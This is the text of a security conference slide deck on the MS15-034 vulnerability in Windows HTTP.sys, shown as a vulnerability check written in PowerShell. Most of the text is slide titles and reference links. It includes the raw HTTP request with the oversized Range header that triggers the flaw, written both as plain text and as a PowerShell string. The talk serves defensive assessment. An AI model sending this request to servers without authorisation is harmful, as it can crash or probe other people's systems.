Exploiting MS15-034 In PowerShell
EXPLOITING MS15-034 IN POWERSHELL
KIERAN JACOBSEN
TECHNICAL LEAD - READIFY
@KJACOBSEN – POSHSECURITY.COM
‘REMOTE CODE EXECUTION’ -IN HTTP.SYS
IF THE BAD GUY CAN EXECUTE CODE ON YOUR BOX, IT ISN’T YOUR BOX ANYMORE.
HTTP.SYS IS EVERYWHERE
IIS KERNEL CACHING MODULE
ARE WE VULNERABLE?
REQUEST -> RESPONSE
GET / HTTP/1.1
Host: google.com
Range: bytes=0-18446744073709551615
Connection: close
GET / HTTP/1.1`r`nHost: google.com`r`nRange: bytes=0-18446744073709551615`r`nConnection: close`r`n`r`n
STREAMS
WORKING WITH TCP
MS15034.PSM1
MORE INFORMATION
• MY WEBSITE – HTTP://POSHSECURITY.COM
• TWITTER - @KJACOBSEN
• MS15-034 MODULE – HTTP://GITHUB.COM/POSHSECURITY/MS15034
• MICROSOFT SECURITY BULLETIN - HTTPS://TECHNET.MICROSOFT.COM/EN-US/LIBRARY/SECURITY/MS15-034.ASPX